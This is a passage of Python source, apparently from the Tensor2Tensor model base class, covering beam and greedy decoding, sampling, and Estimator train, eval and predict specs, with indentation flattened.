decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
      alpha: Float that controls the length penalty. The larger the alpha, the
        stronger the preference for longer translations.
use_tpu: bool, whether to build the inference graph for TPU.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": decoding log probs from the beam search,
None if using greedy decoding (beam_size=1)
}
if slow greedy decoding is used then the dict will also contain {
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`
}
"""
set_custom_getter_compose(self._custom_getter)
with self._eager_var_store.as_default():
# TODO(rsepassi): Make decoding work with real-valued model outputs
# (i.e. if the target modality is RealModality).
self.prepare_features_for_infer(features)
if not self.has_input and beam_size > 1:
log_warn("Beam searching for a model with no inputs.")
if not self.has_input and self.hparams.sampling_method != "random":
log_warn("Non-random sampling for a model with no inputs.")
self._fill_problem_hparams_features(features)
if self._problem_hparams:
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
beam_size = 1 # No use to run beam-search for a single class.
if beam_size == 1:
log_info("Greedy Decoding")
results = self._greedy_infer(features, decode_length, use_tpu)
else:
log_info("Beam Decoding with beam size %d" % beam_size)
results = self._beam_decode(features, decode_length, beam_size,
top_beams, alpha, use_tpu)
return results
def _beam_decode(self,
features,
decode_length,
beam_size,
top_beams,
alpha,
use_tpu=False):
"""Beam search decoding.
Models should ideally implement a more efficient version of this function.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
      alpha: Float that controls the length penalty. The larger the alpha, the
        stronger the preference for longer translations.
use_tpu: A bool, whether to do beam decode on TPU.
Returns:
samples: an integer `Tensor`. Top samples from the beam search
"""
return self._beam_decode_slow(features, decode_length, beam_size, top_beams,
alpha, use_tpu)
def _beam_decode_slow(self, features, decode_length, beam_size, top_beams,
alpha, use_tpu=False):
"""Slow version of Beam search decoding.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
      alpha: Float that controls the length penalty. The larger the alpha, the
        stronger the preference for longer translations.
use_tpu: A bool, whether to do slow beam decode on TPU.
Returns:
samples: an integer `Tensor`. Top samples from the beam search.
Raises:
NotImplementedError: If use_tpu is set to true.
"""
if use_tpu:
raise NotImplementedError(
"Slow beam search inference on TPU is not supported")
batch_size = common_layers.shape_list(features["inputs"])[0]
def symbols_to_logits_fn(ids):
"""Go from ids to logits."""
ids = tf.expand_dims(tf.expand_dims(ids, axis=2), axis=3)
ids = tf.pad(ids[:, 1:], [[0, 0], [0, 1], [0, 0], [0, 0]])
if "partial_targets" in features:
pt = features["partial_targets"]
pt_length = common_layers.shape_list(pt)[1]
pt = tf.tile(pt, [1, beam_size])
pt = tf.reshape(pt, [batch_size * beam_size, pt_length, 1, 1])
ids = tf.concat([pt, ids], axis=1)
features["targets"] = ids
self._coverage = None
logits, _ = self(features) # pylint: disable=not-callable
# now self._coverage is a coverage tensor for the first datashard.
# it has shape [batch_size] and contains floats between 0 and
# source_length.
if self._problem_hparams:
if self._problem_hparams.modality["targets"].top_is_pointwise:
return tf.squeeze(logits, axis=[1, 2, 3])
# -1 due to the pad above.
current_output_position = common_layers.shape_list(ids)[1] - 1
logits = logits[:, current_output_position, :, :]
return tf.squeeze(logits, axis=[1, 2])
initial_ids = tf.zeros([batch_size], dtype=tf.int32)
if self.has_input:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 1)
if len(features["inputs"].shape) < 5:
features["inputs"] = tf.expand_dims(features["inputs"], 4)
# Expand the inputs in to the beam size.
features["inputs"] = tf.tile(features["inputs"], [1, beam_size, 1, 1, 1])
s = common_layers.shape_list(features["inputs"])
features["inputs"] = tf.reshape(features["inputs"],
[s[0] * s[1], s[2], s[3], s[4]])
target_modality = self._problem_hparams.modality["targets"]
vocab_size = target_modality.top_dimensionality
# Setting decode length to input length + decode_length
decode_length = tf.constant(decode_length)
if "partial_targets" not in features:
inputs = features["inputs"]
decode_length = (common_layers.shape_list(inputs)[1] +
features.get("decode_length", decode_length))
ids, scores = beam_search.beam_search(
symbols_to_logits_fn,
initial_ids,
beam_size,
decode_length,
vocab_size,
alpha,
stop_early=(top_beams == 1))
# Set inputs back to the unexpanded inputs to not to confuse the Estimator!
if self.has_input:
features["inputs"] = inputs_old
# Return `top_beams` decodings (also remove initial id from the beam search)
# TODO(lukaszkaiser): make it work multi-problem.
if top_beams == 1:
samples = ids[:, 0, 1:]
else:
samples = ids[:, :top_beams, 1:]
return {"outputs": samples, "scores": scores}
def _greedy_infer(self, features, decode_length, use_tpu=False):
"""A greedy inference method.
Models should ideally implement a more efficient version of this function.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
use_tpu: A bool, whether to build the inference graph for TPU.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
return (self._slow_greedy_infer_tpu(features, decode_length)
if use_tpu else self._slow_greedy_infer(features, decode_length))
def _slow_greedy_infer_tpu(self, features, decode_length):
"""A slow greedy inference method on TPU.
Quadratic time in decode_length.
Args:
features: An map of string to `Tensor`.
decode_length: An integer, how many additional timesteps to decode.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
if not features:
features = {}
inputs_old = None
if "inputs" in features and len(features["inputs"].shape) < 4:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 2)
if not self.has_input:
# Prepare partial targets.
# In either features["inputs"] or features["targets"].
# We force the outputs to begin with these sequences.
partial_targets = features.get("inputs")
if partial_targets is None:
partial_targets = features["targets"]
features["partial_targets"] = tf.to_int64(partial_targets)
# Save the targets in a var and reassign it after the tf.while loop to avoid
# having targets being in a 'while' frame. This ensures targets when used
# in metric functions stays in the same frame as other vars.
targets_old = features.get("targets", None)
target_modality = self._problem_hparams.modality["targets"]
def infer_step(i, recent_output, recent_logits, unused_loss):
"""Inference step."""
if not tf.contrib.eager.in_eager_mode():
recent_output.set_shape([None, None, None, 1])
padded = tf.pad(recent_output, [[0, 0], [0, 1], [0, 0], [0, 0]])
features["targets"] = padded
# This is inefficient in that it generates samples at all timesteps,
# not just the last one, except if target_modality is pointwise.
features["decode_loop_step"] = i
samples, logits, losses = self.sample(features)
# Concatenate the already-generated recent_output with last timestep
# of the newly-generated samples.
if target_modality.top_is_pointwise:
cur_sample = samples[:, -1, :, :]
else:
cur_sample = samples[:, i, :, :]
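      # alias_inplace_update writes along the leading axis, so move the time
      # axis to position 0, write timestep i in place, then transpose back.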
samples = tf.transpose(recent_output, perm=[1, 0, 2, 3])
samples = inplace_ops.alias_inplace_update(samples, i,
tf.to_int64(cur_sample))
samples = tf.transpose(samples, perm=[1, 0, 2, 3])
if not tf.contrib.eager.in_eager_mode():
samples.set_shape([None, None, None, 1])
# Assuming we have one shard for logits.
recent_logits = tf.transpose(recent_logits, perm=[1, 0, 2, 3, 4])
recent_logits = inplace_ops.alias_inplace_update(
recent_logits, i, tf.squeeze(logits[:, -1:], axis=1))
logits = tf.transpose(recent_logits, perm=[1, 0, 2, 3, 4])
loss = sum([l for l in losses.values() if l is not None])
return i + 1, samples, logits, loss
# Create an initial output tensor. This will be passed
# to the infer_step, which adds one timestep at every iteration.
if "partial_targets" in features:
initial_output = tf.to_int64(features["partial_targets"])
while len(initial_output.get_shape().as_list()) < 4:
initial_output = tf.expand_dims(initial_output, 2)
batch_size = common_layers.shape_list(initial_output)[0]
else:
batch_size = common_layers.shape_list(features["inputs"])[0]
initial_output = tf.zeros((batch_size, 0, 1, 1), dtype=tf.int64)
# Hack: foldl complains when the output shape is less specified than the
# input shape, so we confuse it about the input shape.
initial_output = tf.slice(initial_output, [0, 0, 0, 0],
common_layers.shape_list(initial_output))
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
decode_length = 1
else:
if "partial_targets" in features:
prefix_length = common_layers.shape_list(features["partial_targets"])[1]
else:
prefix_length = common_layers.shape_list(features["inputs"])[1]
decode_length = prefix_length + decode_length
# Initial values of result, logits and loss.
result = tf.concat(
[initial_output,
tf.zeros([batch_size, decode_length, 1, 1], tf.int64)],
axis=1)
# tensor padded to [batch_size, decode_length, 1, 1, vocab_size]
logits = tf.zeros((batch_size, decode_length, 1, 1,
target_modality.top_dimensionality))
if not tf.contrib.eager.in_eager_mode():
logits.set_shape([None, None, None, None, None])
loss = 0.0
def while_exit_cond(i, result, logits, loss): # pylint: disable=unused-argument
"""Exit the loop either if reach decode_length or EOS."""
not_overflow = i < decode_length
if self._problem_hparams.stop_at_eos:
def fn_not_eos():
# Check if the last predicted element is a EOS
return tf.reduce_any(
tf.not_equal(
tf.squeeze(result[:, -1, :, :]), text_encoder.EOS_ID))
not_eos = tf.cond(
# We only check for early stopping if there is at least 1 element (
# otherwise not_eos will crash).
tf.not_equal(i, 0),
fn_not_eos,
lambda: True,
)
return tf.cond(
tf.equal(batch_size, 1),
# If batch_size == 1, we check EOS for early stopping.
lambda: tf.logical_and(not_overflow, not_eos),
# Else, just wait for max length
lambda: not_overflow)
return not_overflow
_, result, logits, loss = tf.while_loop(
while_exit_cond,
infer_step, [tf.constant(0), result, logits, loss],
shape_invariants=[
tf.TensorShape([]),
tf.TensorShape([batch_size, decode_length, 1, 1]),
tf.TensorShape([
batch_size, decode_length, 1, 1,
target_modality.top_dimensionality
]),
tf.TensorShape([]),
],
back_prop=False,
parallel_iterations=1)
if inputs_old is not None: # Restore to not confuse Estimator.
features["inputs"] = inputs_old
# Reassign targets back to the previous value.
if targets_old is not None:
features["targets"] = targets_old
losses = {"training": loss}
if "partial_targets" in features:
partial_target_length = common_layers.shape_list(
features["partial_targets"])[1]
result = tf.slice(result, [0, partial_target_length, 0, 0],
[-1, -1, -1, -1])
return {
"outputs": result,
"scores": None,
"logits": logits,
"losses": losses,
}
def _slow_greedy_infer(self, features, decode_length):
"""A slow greedy inference method.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
if not features:
features = {}
inputs_old = None
if "inputs" in features and len(features["inputs"].shape) < 4:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 2)
if not self.has_input:
# Prepare partial targets.
# In either features["inputs"] or features["targets"].
# We force the outputs to begin with these sequences.
partial_targets = features.get("inputs")
if partial_targets is None:
partial_targets = features["targets"]
features["partial_targets"] = tf.to_int64(partial_targets)
# Save the targets in a var and reassign it after the tf.while loop to avoid
# having targets being in a 'while' frame. This ensures targets when used
# in metric functions stays in the same frame as other vars.
targets_old = features.get("targets", None)
target_modality = self._problem_hparams.modality["targets"]
def infer_step(recent_output, recent_logits, unused_loss):
"""Inference step."""
if not tf.contrib.eager.in_eager_mode():
if self._target_modality_is_real:
dim = self._problem_hparams.modality["targets"].top_dimensionality
recent_output.set_shape([None, None, None, dim])
else:
recent_output.set_shape([None, None, None, 1])
padded = tf.pad(recent_output, [[0, 0], [0, 1], [0, 0], [0, 0]])
features["targets"] = padded
# This is inefficient in that it generates samples at all timesteps,
# not just the last one, except if target_modality is pointwise.
samples, logits, losses = self.sample(features)
# Concatenate the already-generated recent_output with last timestep
# of the newly-generated samples.
if target_modality.top_is_pointwise:
cur_sample = samples[:, -1, :, :]
else:
cur_sample = samples[:,
common_layers.shape_list(recent_output)[1], :, :]
if self._target_modality_is_real:
cur_sample = tf.expand_dims(cur_sample, axis=1)
samples = tf.concat([recent_output, cur_sample], axis=1)
else:
cur_sample = tf.to_int64(tf.expand_dims(cur_sample, axis=1))
samples = tf.concat([recent_output, cur_sample], axis=1)
if not tf.contrib.eager.in_eager_mode():
samples.set_shape([None, None, None, 1])
# Assuming we have one shard for logits.
logits = tf.concat([recent_logits, logits[:, -1:]], 1)
loss = sum([l for l in losses.values() if l is not None])
return samples, logits, loss
# Create an initial output tensor. This will be passed
# to the infer_step, which adds one timestep at every iteration.
if "partial_targets" in features:
initial_output = tf.to_int64(features["partial_targets"])
while len(initial_output.get_shape().as_list()) < 4:
initial_output = tf.expand_dims(initial_output, 2)
batch_size = common_layers.shape_list(initial_output)[0]
else:
batch_size = common_layers.shape_list(features["inputs"])[0]
if self._target_modality_is_real:
dim = self._problem_hparams.modality["targets"].top_dimensionality
initial_output = tf.zeros((batch_size, 0, 1, dim), dtype=tf.float32)
else:
initial_output = tf.zeros((batch_size, 0, 1, 1), dtype=tf.int64)
# Hack: foldl complains when the output shape is less specified than the
# input shape, so we confuse it about the input shape.
initial_output = tf.slice(initial_output, [0, 0, 0, 0],
common_layers.shape_list(initial_output))
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
decode_length = 1
else:
if "partial_targets" in features:
prefix_length = common_layers.shape_list(features["partial_targets"])[1]
else:
prefix_length = common_layers.shape_list(features["inputs"])[1]
decode_length = prefix_length + decode_length
# Initial values of result, logits and loss.
result = initial_output
if self._target_modality_is_real:
logits = tf.zeros((batch_size, 0, 1, target_modality.top_dimensionality))
logits_shape_inv = [None, None, None, None]
else:
# tensor of shape [batch_size, time, 1, 1, vocab_size]
logits = tf.zeros((batch_size, 0, 1, 1,
target_modality.top_dimensionality))
logits_shape_inv = [None, None, None, None, None]
if not tf.contrib.eager.in_eager_mode():
logits.set_shape(logits_shape_inv)
loss = 0.0
def while_exit_cond(result, logits, loss): # pylint: disable=unused-argument
"""Exit the loop either if reach decode_length or EOS."""
length = common_layers.shape_list(result)[1]
not_overflow = length < decode_length
if self._problem_hparams.stop_at_eos:
def fn_not_eos():
return tf.not_equal( # Check if the last predicted element is a EOS
tf.squeeze(result[:, -1, :, :]), text_encoder.EOS_ID)
not_eos = tf.cond(
# We only check for early stopping if there is at least 1 element (
# otherwise not_eos will crash).
tf.not_equal(length, 0),
fn_not_eos,
lambda: True,
)
return tf.cond(
tf.equal(batch_size, 1),
# If batch_size == 1, we check EOS for early stopping.
lambda: tf.logical_and(not_overflow, not_eos),
# Else, just wait for max length
lambda: not_overflow)
return not_overflow
result, logits, loss = tf.while_loop(
while_exit_cond,
infer_step, [result, logits, loss],
shape_invariants=[
tf.TensorShape([None, None, None, None]),
tf.TensorShape(logits_shape_inv),
tf.TensorShape([]),
],
back_prop=False,
parallel_iterations=1)
if inputs_old is not None: # Restore to not confuse Estimator.
features["inputs"] = inputs_old
# Reassign targets back to the previous value.
if targets_old is not None:
features["targets"] = targets_old
losses = {"training": loss}
if "partial_targets" in features:
partial_target_length = common_layers.shape_list(
features["partial_targets"])[1]
result = tf.slice(result, [0, partial_target_length, 0, 0],
[-1, -1, -1, -1])
return {
"outputs": result,
"scores": None,
"logits": logits,
"losses": losses,
}
def sample(self, features):
"""Run the model and extract samples.
Args:
      features: a map of string to `Tensor`.
Returns:
samples: an integer `Tensor`.
logits: a list of `Tensor`s, one per datashard.
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
"""
logits, losses = self(features) # pylint: disable=not-callable
if self._target_modality_is_real:
return logits, logits, losses # Raw numbers returned from real modality.
if self.hparams.sampling_method == "argmax":
samples = tf.argmax(logits, axis=-1)
else:
assert self.hparams.sampling_method == "random"
def multinomial_squeeze(logits, temperature=1.0):
logits_shape = common_layers.shape_list(logits)
reshaped_logits = (
tf.reshape(logits, [-1, logits_shape[-1]]) / temperature)
choices = tf.multinomial(reshaped_logits, 1)
choices = tf.reshape(choices, logits_shape[:-1])
return choices
samples = multinomial_squeeze(logits, self.hparams.sampling_temp)
return samples, logits, losses
def _shard_features(self, features): # pylint: disable=missing-docstring
sharded_features = dict()
for k, v in sorted(six.iteritems(features)):
v = tf.convert_to_tensor(v)
v_shape = common_layers.shape_list(v)
if not v_shape:
v = tf.expand_dims(v, axis=-1)
v_shape = [1]
if v_shape == [1]:
v = tf.tile(v, tf.to_int32([self._num_datashards]))
sharded_features[k] = self._data_parallelism(
tf.identity, tf.split(v, self._num_datashards, 0))
return sharded_features
def _to_features_per_datashard(self, features):
datashard_features = []
assert len(features[list(features.keys())[0]]) == self._num_datashards
for d in range(self._num_datashards):
f = {k: v[d] for k, v in six.iteritems(features)}
datashard_features.append(f)
return datashard_features
def _to_single_features_dict(self, datashard_features):
assert len(datashard_features) == self._num_datashards
features = collections.defaultdict(list)
for feats in datashard_features:
for k, v in six.iteritems(feats):
features[k].append(v)
return features
@staticmethod
def get_train_hooks(model_name, hook_context):
model_cls = registry.model(model_name)
return model_cls.train_hooks(hook_context)
@staticmethod
def get_eval_hooks(model_name, hook_context):
model_cls = registry.model(model_name)
return model_cls.eval_hooks(hook_context)
@staticmethod
def make_estimator_model_fn(model_name,
hparams,
decode_hparams=None,
use_tpu=False):
model_cls = registry.model(model_name)
def wrapping_model_fn(features, labels, mode, params=None, config=None):
return model_cls.estimator_model_fn(
hparams,
features,
labels,
mode,
config=config,
params=params,
decode_hparams=decode_hparams,
use_tpu=use_tpu)
return wrapping_model_fn
@classmethod
def estimator_model_fn(cls,
hparams,
features,
labels,
mode,
config=None,
params=None,
decode_hparams=None,
use_tpu=False):
"""Model fn for Estimator.
Args:
hparams: HParams, model hyperparameters
features: dict<str name, Tensor feature>
labels: Tensor
mode: tf.estimator.ModeKeys
config: RunConfig, possibly with data_parallelism attribute
params: dict, may include batch_size, use_tpu
decode_hparams: HParams, used when mode == PREDICT.
use_tpu: A bool, whether to build the inference graph for TPU.
Returns:
TPUEstimatorSpec if use tpu else EstimatorSpec
"""
if mode == tf.estimator.ModeKeys.TRAIN:
_create_dummy_vars()
hparams = copy.deepcopy(hparams)
# Instantiate model
data_parallelism = None
if not use_tpu and config:
data_parallelism = config.data_parallelism
reuse = tf.get_variable_scope().reuse
model = cls(
hparams,
mode,
data_parallelism=data_parallelism,
decode_hparams=decode_hparams,
_reuse=reuse)
# PREDICT mode
if mode == tf.estimator.ModeKeys.PREDICT:
if use_tpu:
inputs = features["inputs"]
shape = inputs.get_shape().as_list()
if shape[0] is None:
shape[0] = decode_hparams.batch_size or hparams.batch_size
if shape[1] is None:
shape[1] = hparams.max_input_seq_length or hparams.max_length
inputs.set_shape(shape)
return model.estimator_spec_predict(features, use_tpu=use_tpu)
# TRAIN and EVAL modes
if hparams.eval_run_autoregressive and mode == tf.estimator.ModeKeys.EVAL:
logits, losses_dict = model.eval_autoregressive(features)
else:
logits, losses_dict = model(features) # pylint: disable=not-callable
# Set known shapes
if common_layers.is_xla_compiled():
if isinstance(logits, dict):
for k, v in sorted(six.iteritems(logits)):
if "scalar/" in k:
continue
shape = v.get_shape().as_list()
if shape[0] is None:
shape[0] = params["batch_size"]
if shape[1] is None:
shape[1] = hparams.max_length
v.set_shape(shape)
else:
shape = logits.get_shape().as_list()
if shape[0] is None:
shape[0] = params["batch_size"]
if shape[1] is None:
shape[1] = hparams.max_length
logits.set_shape(shape)
assert "training" in losses_dict
# Attack mode
if mode == "attack":
return logits
# Summarize losses
model._summarize_losses(losses_dict) # pylint: disable=protected-access
# Accumulate losses
loss = sum(losses_dict[key] for key in sorted(losses_dict.keys()))
# EVAL mode
if mode == tf.estimator.ModeKeys.EVAL:
return model.estimator_spec_eval(features, logits, labels, loss,
losses_dict)
# TRAIN mode
assert mode == tf.estimator.ModeKeys.TRAIN
num_async_replicas = (1 if (use_tpu or not config) else
config.t2t_device_info["num_async_replicas"])
return model.estimator_spec_train(
loss, num_async_replicas=num_async_replicas, use_tpu=use_tpu)
def initialize_from_ckpt(self, ckpt_dir):
model_dir = self._hparams.get("model_dir", None)
already_has_ckpt = (
model_dir and tf.train.latest_checkpoint(model_dir) is not None)
if already_has_ckpt:
return
# TODO(mitchellstern): Add support for partitioned variables?
reader = tf.contrib.framework.load_checkpoint(ckpt_dir)
variable_map = {}
for var in tf.contrib.framework.get_trainable_variables():
var_name = var.name.split(":")[0]
if reader.has_tensor(var_name):
log_info("Loading variable from checkpoint: %s", var_name)
variable_map[var_name] = var
else:
log_info(
"Cannot find variable in checkpoint, skipping: %s", var_name)
tf.train.init_from_checkpoint(ckpt_dir, variable_map)
def estimator_spec_train(self, loss, num_async_replicas=1, use_tpu=False):
"""Constructs `tf.estimator.EstimatorSpec` for TRAIN (training) mode."""
train_op = self.optimize(loss, num_async_replicas=num_async_replicas,
use_tpu=use_tpu)
if use_tpu:
if self._hparams.warm_start_from:
def scaffold_fn():
self.initialize_from_ckpt(self._hparams.warm_start_from)
return tf.train.Scaffold()
else:
scaffold_fn = None
# Note: important to call this before remove_summaries()
if self.hparams.tpu_enable_host_call:
host_call = create_host_call(self.hparams.model_dir)
else:
host_call = None
remove_summaries()
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.TRAIN,
loss=loss,
train_op=train_op,
host_call=host_call,
scaffold_fn=scaffold_fn)
else:
if self._hparams.warm_start_from:
self.initialize_from_ckpt(self._hparams.warm_start_from)
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.TRAIN, loss=loss, train_op=train_op)
def estimator_spec_eval(self, features, logits, labels, loss, losses_dict):
"""Constructs `tf.estimator.EstimatorSpec` for EVAL (evaluation) mode."""
del losses_dict
hparams = self.hparams
if not hasattr(hparams, "problem"):
raise NotImplementedError(_no_problem_err("estimator_spec_eval"))
problem = hparams.problem
if common_layers.is_xla_compiled():
remove_summaries()
if isinstance(logits, dict):
eval_metrics_fn = create_tpu_eval_metrics_fn(problem, hparams)
# For TPU, logits dict will be passed as keyword arguments to
# eval_metrics_fn. Here we add the labels to those arguments.
logits.update({"labels": labels})
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.EVAL,
eval_metrics=(eval_metrics_fn, logits),
loss=loss)
else:
eval_metrics_fn = create_tpu_eval_metrics_fn(problem, hparams)
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.EVAL,
eval_metrics=(eval_metrics_fn, [logits, labels]),
loss=loss)
else:
task_list = [problem]
if hasattr(problem, "task_list"):
task_list = problem.task_list
eval_metrics_fns = metrics.create_evaluation_metrics(task_list, hparams)
eval_metrics = {}
for metric_name, metric_fn in six.iteritems(eval_metrics_fns):
if isinstance(logits, dict):
# the key is located in the center of metric_name: "metrics-%s/%s/%s"
k = metric_name.split("/")[1]
if k in logits:
eval_metrics[metric_name] = metric_fn(logits[k], features,
features[k])
else:
# We do not make it an error because we sometimes run models that
# predict only parts of the targets defined by the Problem class.
# For example, an autoencoder or pure-video model can run on a gym
# problem even if another model is also predicting other things,
# like actions or rewards.
tf.logging.warning("No key %s in logits for evaluation." % k)
else:
eval_metrics[metric_name] = metric_fn(logits, features,
features["targets"])
if isinstance(logits, dict):
predictions = logits
else:
predictions = {"predictions": logits}
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.EVAL,
predictions=predictions,
eval_metric_ops=eval_metrics,
loss=loss)
def estimator_spec_predict(self, features, use_tpu=False):
"""Constructs `tf.estimator.EstimatorSpec` for PREDICT (inference) mode."""
decode_hparams = self._decode_hparams
infer_out = self.infer(
features,
beam_size=decode_hparams.beam_size,
top_beams=(decode_hparams.beam_size
if decode_hparams.return_beams else 1),
alpha=decode_hparams.alpha,
decode_length=decode_hparams.extra_length,
use_tpu=use_tpu)
if isinstance(infer_out, dict):
outputs = infer_out["outputs"]
scores = infer_out["scores"]
else:
outputs = infer_out
scores = None
inputs = features.get("inputs")
if inputs is None:
inputs = features["targets"]
predictions = {
"outputs": outputs,
"scores": scores,
"inputs": inputs,
"targets": features.get("infer_targets"),
}
# Pass through remaining features
for name, feature in features.items():
if name not in list(predictions.keys()) + ["infer_targets"]:
if not feature.shape.as_list():
# All features must have a batch dimension
batch_size = common_layers.shape_list(outputs)[0]
feature = tf.tile(tf.expand_dims(feature, 0), [batch_size])
predictions[name] = feature
_del_dict_non_tensors(predictions)
export_out = {"outputs": predictions["outputs"]}
if "scores" in predictions:
export_out["scores"] = predictions["scores"]
# Necessary to rejoin examples in the correct order with the Cloud ML Engine
# batch prediction API.
if "batch_prediction_key" in predictions:
export_out["batch_prediction_key"] = predictions["batch_prediction_key"]
remove_summaries()
export_outputs = {
tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.PredictOutput(export_out)
}
if use_tpu:
return tf.contrib.tpu.TPUEstimatorSpec(
tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs=export_outputs)
else:
return tf.estimator.EstimatorSpec(
tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs=export_outputs)
def _normalize_body_output(self, body_out):
if isinstance(body_out, tuple):
output, losses = body_out
if not isinstance(losses, dict):
losses = {"extra": tf.reduce_mean(losses)}
else:
output = body_out
losses = {"extra": 0.0}
return output, losses
def _summarize_losses(self, losses_dict):
"""Adds `tf.summary`s to all terms in the losses dictionary."""
if common_layers.should_generate_summaries():
with tf.name_scope("losses"):
for loss_name, loss_val in sorted(losses_dict.items()):
tf.summary.scalar(loss_name, loss_val)
def _with_timing(fn, msg, silent=False):
def fn_with_timing(*args, **kwargs):
start_time = time.time()
res = fn(*args, **kwargs)
if not silent:
log_info("Doing %s took %.3f sec." % (msg, time.time() - start_time))
return res
return fn_with_timing
def _create_dummy_vars():
"""Dummy vars for restore to work when not using TPU codepath."""
var_names = set([v.name for v in tf.global_variables()])
if "losses_avg/problem_0/total_loss:0" in var_names:
return
with tf.variable_scope("losses_avg"):
with tf.variable_scope("problem_0"):
for var_name in ["total", "extra", "training"]:
tf.get_variable(
"%s_loss" % var_name, initializer=100.0, trainable=False)
with tf.variable_scope("train_stats"):
tf.get_variable("problem_0_steps", initializer=0, trainable=False)
# These metrics are implemented with py_funcs and therefore do not work with TPU
TPU_METRIC_BLACKLIST = set([
metrics.Metrics.APPROX_BLEU,
metrics.Metrics.ROUGE_2_F,
metrics.Metrics.ROUGE_L_F,
metrics.Metrics.IMAGE_SUMMARY,
])
def create_tpu_eval_metrics_fn(problem, model_hparams):
"""Create the metrics_fn that TPUEstimatorSpec expects."""
metric_fns = []
eval_metrics = problem.eval_metrics()
tm = _create_target_modality(problem.get_hparams(model_hparams).modality)
if isinstance(tm, dict):
for k, v in six.iteritems(tm):
weights_fn = v.targets_weights_fn
def make_metric_fn(metric_fn):
def wrapped_metric_fn(logits, labels, weights_fn=weights_fn):
num, den = metric_fn(logits, labels, weights_fn=weights_fn)
return tf.metrics.mean(num, den)
return wrapped_metric_fn
for metric in eval_metrics:
if metric in TPU_METRIC_BLACKLIST:
log_warn("Skipping eval metric %s in TPU_METRIC_BLACKLIST", metric)
continue
name = "%s/metrics-%s/%s" % (k, problem.name, metric)
metric_fns.append((name, make_metric_fn(metrics.METRICS_FNS[metric])))
else:
weights_fn = tm.targets_weights_fn
def make_metric_fn(metric_fn):
def wrapped_metric_fn(logits, labels):
num, den = metric_fn(logits, labels, weights_fn=weights_fn)
return tf.metrics.mean(num, den)
return wrapped_metric_fn
for metric in eval_metrics:
if metric in TPU_METRIC_BLACKLIST:
log_warn("Skipping eval metric %s in TPU_METRIC_BLACKLIST", metric)
continue
name = "metrics-%s/%s" % (problem.name, metric)
metric_fns.append((name, make_metric_fn(metrics.METRICS_FNS[metric])))
def all_metrics_fn(logits=None, labels=None, **kwargs):
"""Construct metrics dictionary."""
metrics_dict = {}
if logits is None:
logits = kwargs
for name, fn in metric_fns:
if isinstance(logits, dict) and isinstance(labels, dict):
for k, v in six.iteritems(logits):
metrics_dict["%s/%s" % (k, name)] = fn(v, labels[k])
elif isinstance(logits, dict):
tf.logging.warning("Logits is a dict, but labels is not; only "
"evaluating logits['targets'] against labels.")
metrics_dict["%s/%s" % ("targets", name)] = fn(logits["targets"],
labels)
else:
metrics_dict[name] = fn(logits, labels)
return metrics_dict
return all_metrics_fn
def remove_summaries():
"""Remove summaries from the default graph."""
g = tf.get_default_graph()
key = tf.GraphKeys.SUMMARIES
log_debug("Remove summaries %s" % str(g.get_collection(key)))
del g.get_collection_ref(key)[:]
assert not g.get_collection(key)
def create_host_call(model_dir):
"""Construct a host_call writing scalar summaries.
Args:
    model_dir: String, path to the model (training) directory where summaries are written.
Returns:
(fn, args) Pair to be called by TPUEstimator as the host_call.
"""
graph = tf.get_default_graph()
summaries = graph.get_collection(tf.GraphKeys.SUMMARIES)
gs_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
summary_kwargs = collections.OrderedDict()
for t in summaries:
# TODO(aidangomez): enable ImageSummary support when we have a faster method
# see @shibow's comment in cl/202344570
if t.op.type not in ["ScalarSummary"]:
tf.logging.warn("Ignoring unsupported tf.Summary type %s" % t.op.type)
continue
name = t.op.name
tensor = t.op.inputs[1]
if t.op.type == "ScalarSummary":
assert tensor.shape.is_compatible_with([])
if tensor.dtype == tf.int64:
tensor = tf.to_int32(tensor)
summary_kwargs["ScalarSummary" + name] = tf.reshape(tensor, [1])
elif t.op.type == "ImageSummary":
